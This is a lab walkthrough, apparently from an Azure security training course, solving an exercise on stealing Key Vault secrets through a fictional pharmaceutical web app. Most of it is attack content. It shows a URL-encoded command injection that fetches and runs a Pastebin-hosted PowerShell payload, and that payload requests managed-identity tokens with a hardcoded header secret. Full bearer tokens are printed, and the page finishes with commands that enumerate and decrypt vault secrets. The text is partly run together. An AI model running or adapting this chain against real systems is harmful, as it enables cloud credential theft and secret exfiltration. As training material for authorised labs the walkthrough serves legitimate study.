Learning Objective 19
Task • In the Attack Lab: − Extract the Keys and Secrets from the Key Vault (compositionsecrets). − Leverage the Keys to decrypt the Secrets Applies to: Attack Lab Topics Covered: Key Vault RBAC Roles, Extract Keys, Secret and Decrypt Secrets
Solution
Recall that in Learning Objective 10 we had enumerated that the Managed Identity of https://analytics.pharmacorphq.com/ application has access to the “compositionsecrets” Key Vault.
So, let’s follow the same steps and request the ARM & Key Vault access tokens.
PowerShell code snippet that we need to upload on the file hosting sites.
The below payload will help is getting the ARM access token.
$headers = @{
'secret' = 'B0EC45CEE3344FFF8BFC97E7FA2B2FED'
}
Invoke-RestMethod -Method GET -Uri "http://127.0.0.1:41255/msi/token/?resource=https://management.azure.com&api-version=2017-09-01" -Headers $headersCopy the code to Pastebin
powershell -c IEX (irm 'https://pastebin.com/raw/0PsAz1ZX')%70%6f%77%65%72%73%68%65%6c%6c%20%2d%63%20%49%45%58%20%28%69%72%6d%20%27%68%74%74%70%73%3a%2f%2f%70%61%73%74%65%62%69%6e%2e%63%6f%6d%2f%72%61%77%2f%30%50%73%41%7a%31%5a%58%27%29https://analytics.pharmacorphq.com/main?inputUser={OS_INJECTION}&category-color=dangeraccess_token : eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ik1HTHFqOThWTkxvWGFGZnBKQ0JwZ0I0SmFLcyIsImtpZCI6Ik1HTHFqOThWTkxvWGFGZnBKQ0JwZ0I0SmFLcyJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvZTBmOTk5YzEtODZlZS00N2EwLWJmZDUtMTg0NzAxNTRiN2NkLyIsImlhdCI6MTcyMTg2NTMwNSwibmJmIjoxNzIxODY1MzA1LCJleHAiOjE3MjE5NTIwMDUsImFpbyI6IkUyZGdZUENSTEVvK2VDMWpvZ2h6Nk8yKy9RNlJBQT09IiwiYXBwaWQiOiIzMzI5ZmVhNy02NDJlLTRjMDktYjFhZC1kOGVkYmUxNDAyNjciLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC9lMGY5OTljMS04NmVlLTQ3YTAtYmZkNS0xODQ3MDE1NGI3Y2QvIiwiaWR0eXAiOiJhcHAiLCJvaWQiOiI3ZGY5YWU1Ny0zZWI5LTQzN2MtYTBlMi03MTQyODM3ODRjZGQiLCJyaCI6IjAuQVhFQXdabjU0TzZHb0VlXzFSaEhBVlMzelVaSWYza0F1dGRQdWtQYXdmajJNQk9IQUFBLiIsInN1YiI6IjdkZjlhZTU3LTNlYjktNDM3Yy1hMGUyLTcxNDI4Mzc4NGNkZCIsInRpZCI6ImUwZjk5OWMxLTg2ZWUtNDdhMC1iZmQ1LTE4NDcwMTU0YjdjZCIsInV0aSI6IjNWSGtOSHByVkUtRGEzNXJrbWRyQUEiLCJ2ZXIiOiIxLjAiLCJ4bXNfaWRyZWwiOiI0IDciLCJ4bXNfbWlyaWQiOiIvc3Vic2NyaXB0aW9ucy9hYWMwMmY3NC1iMGQyLTQ1ZDItOGZiYy04ZDMzZjI3NDExNmYvcmVzb3VyY2Vncm91cHMvQW5hbHl0aWNzL3Byb3ZpZGVycy9NaWNyb3NvZnQuV2ViL3NpdGVzL2FuYWx5dGljc3BoYXJtYWNvcnAiLCJ4bXNfdGNkdCI6IjE2NTUzNTM2MjgifQ.XqC1k5xYgX8uWZr70J66VtuFCIdtxZAsNMTNgTaUysv-ag9etC-rJr3gGmLyEXsGrbKFP3qmbE08C4EhF29q1zmO0W_mjQTC2t6HUC0s0LyCVFtGI7TGuMRxL0fG9QGeAGv1oAjobmBoaJL7YsXUo9SjsASF88wzCxCWPAkW9wS2uZpJ7nXYR89KhITomySeukP0DRyUrdd4nefs-K_Cq4zNE1OOUV36hx5o9uf6kYSCdGz2r-92-iLNM-XZIvLx63F7le9t1x4mNVGfZsUtVCJ3eYivA1TGZ9NuZeb71YwmkiVsls4NLjfPSmjkWh4Bv0in9AVea7i53rJqiF6q3g
expires_on : 7/26/2024 12:00:04 AM +00:00resource : https://management.azure.com
token_type : Bearerclient_id : 3329FEA7-642E-4C09-B1AD-D8EDBE140267$Access_Token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ik1HTHFqOThWTkxvWGFGZnBKQ0JwZ0I0SmFLcyIsImtpZCI6Ik1HTHFqOThWTkxvWGFGZnBKQ0JwZ0I0SmFLcyJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvZTBmOTk5YzEtODZlZS00N2EwLWJmZDUtMTg0NzAxNTRiN2NkLyIsImlhdCI6MTcyMTg2NTMwNSwibmJmIjoxNzIxODY1MzA1LCJleHAiOjE3MjE5NTIwMDUsImFpbyI6IkUyZGdZUENSTEVvK2VDMWpvZ2h6Nk8yKy9RNlJBQT09IiwiYXBwaWQiOiIzMzI5ZmVhNy02NDJlLTRjMDktYjFhZC1kOGVkYmUxNDAyNjciLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC9lMGY5OTljMS04NmVlLTQ3YTAtYmZkNS0xODQ3MDE1NGI3Y2QvIiwiaWR0eXAiOiJhcHAiLCJvaWQiOiI3ZGY5YWU1Ny0zZWI5LTQzN2MtYTBlMi03MTQyODM3ODRjZGQiLCJyaCI6IjAuQVhFQXdabjU0TzZHb0VlXzFSaEhBVlMzelVaSWYza0F1dGRQdWtQYXdmajJNQk9IQUFBLiIsInN1YiI6IjdkZjlhZTU3LTNlYjktNDM3Yy1hMGUyLTcxNDI4Mzc4NGNkZCIsInRpZCI6ImUwZjk5OWMxLTg2ZWUtNDdhMC1iZmQ1LTE4NDcwMTU0YjdjZCIsInV0aSI6IjNWSGtOSHByVkUtRGEzNXJrbWRyQUEiLCJ2ZXIiOiIxLjAiLCJ4bXNfaWRyZWwiOiI0IDciLCJ4bXNfbWlyaWQiOiIvc3Vic2NyaXB0aW9ucy9hYWMwMmY3NC1iMGQyLTQ1ZDItOGZiYy04ZDMzZjI3NDExNmYvcmVzb3VyY2Vncm91cHMvQW5hbHl0aWNzL3Byb3ZpZGVycy9NaWNyb3NvZnQuV2ViL3NpdGVzL2FuYWx5dGljc3BoYXJtYWNvcnAiLCJ4bXNfdGNkdCI6IjE2NTUzNTM2MjgifQ.XqC1k5xYgX8uWZr70J66VtuFCIdtxZAsNMTNgTaUysv-ag9etC-rJr3gGmLyEXsGrbKFP3qmbE08C4EhF29q1zmO0W_mjQTC2t6HUC0s0LyCVFtGI7TGuMRxL0fG9QGeAGv1oAjobmBoaJL7YsXUo9SjsASF88wzCxCWPAkW9wS2uZpJ7nXYR89KhITomySeukP0DRyUrdd4nefs-K_Cq4zNE1OOUV36hx5o9uf6kYSCdGz2r-92-iLNM-XZIvLx63F7le9t1x4mNVGfZsUtVCJ3eYivA1TGZ9NuZeb71YwmkiVsls4NLjfPSmjkWh4Bv0in9AVea7i53rJqiF6q3g"$KeyVault_Token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ik1HTHFqOThWTkxvWGFGZnBKQ0JwZ0I0SmFLcyIsImtpZCI6Ik1HTHFqOThWTkxvWGFGZnBKQ0JwZ0I0SmFLcyJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvZTBmOTk5YzEtODZlZS00N2EwLWJmZDUtMTg0NzAxNTRiN2NkLyIsImlhdCI6MTcyMTg2NTMwNSwibmJmIjoxNzIxODY1MzA1LCJleHAiOjE3MjE5NTIwMDUsImFpbyI6IkUyZGdZUENSTEVvK2VDMWpvZ2h6Nk8yKy9RNlJBQT09IiwiYXBwaWQiOiIzMzI5ZmVhNy02NDJlLTRjMDktYjFhZC1kOGVkYmUxNDAyNjciLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC9lMGY5OTljMS04NmVlLTQ3YTAtYmZkNS0xODQ3MDE1NGI3Y2QvIiwiaWR0eXAiOiJhcHAiLCJvaWQiOiI3ZGY5YWU1Ny0zZWI5LTQzN2MtYTBlMi03MTQyODM3ODRjZGQiLCJyaCI6IjAuQVhFQXdabjU0TzZHb0VlXzFSaEhBVlMzelVaSWYza0F1dGRQdWtQYXdmajJNQk9IQUFBLiIsInN1YiI6IjdkZjlhZTU3LTNlYjktNDM3Yy1hMGUyLTcxNDI4Mzc4NGNkZCIsInRpZCI6ImUwZjk5OWMxLTg2ZWUtNDdhMC1iZmQ1LTE4NDcwMTU0YjdjZCIsInV0aSI6IjNWSGtOSHByVkUtRGEzNXJrbWRyQUEiLCJ2ZXIiOiIxLjAiLCJ4bXNfaWRyZWwiOiI0IDciLCJ4bXNfbWlyaWQiOiIvc3Vic2NyaXB0aW9ucy9hYWMwMmY3NC1iMGQyLTQ1ZDItOGZiYy04ZDMzZjI3NDExNmYvcmVzb3VyY2Vncm91cHMvQW5hbHl0aWNzL3Byb3ZpZGVycy9NaWNyb3NvZnQuV2ViL3NpdGVzL2FuYWx5dGljc3BoYXJtYWNvcnAiLCJ4bXNfdGNkdCI6IjE2NTUzNTM2MjgifQ.XqC1k5xYgX8uWZr70J66VtuFCIdtxZAsNMTNgTaUysv-ag9etC-rJr3gGmLyEXsGrbKFP3qmbE08C4EhF29q1zmO0W_mjQTC2t6HUC0s0LyCVFtGI7TGuMRxL0fG9QGeAGv1oAjobmBoaJL7YsXUo9SjsASF88wzCxCWPAkW9wS2uZpJ7nXYR89KhITomySeukP0DRyUrdd4nefs-K_Cq4zNE1OOUV36hx5o9uf6kYSCdGz2r-92-iLNM-XZIvLx63F7le9t1x4mNVGfZsUtVCJ3eYivA1TGZ9NuZeb71YwmkiVsls4NLjfPSmjkWh4Bv0in9AVea7i53rJqiF6q3g"
Connect-AzAccount -AccessToken $Access_Token -KeyVaultAccessToken $KeyVault_Token -AccountId "3329FEA7-642E-4C09-B1ADD8EDBE140267"PS C:\AzAppsec\Tools> Get-AzResource $KeyVault = Get-AzKeyVault $KeyVault$KeyVaultSecretName = Get-AzKeyVaultSecret -VaultName $KeyVault.VaultName$KeyVaultSecretName$EncryptedValue = Get-AzKeyVaultSecret -VaultName $KeyVault.VaultName -Name $KeyVaultSecretName.Name -AsPlainText$KeyVaultKey = Get-AzKeyVaultKey -VaultName $KeyVault.VaultName$KeyVaultKeyInvoke-AzKeyVaultKeyOperation -Operation Decrypt -Algorithm RSA1_5 -VaultName $KeyVault.VaultName -Name $KeyVaultKey.Name -Value (ConvertTo-SecureString -String $EncryptedValue -AsPlainText -Force) | FLLast updated
Was this helpful?
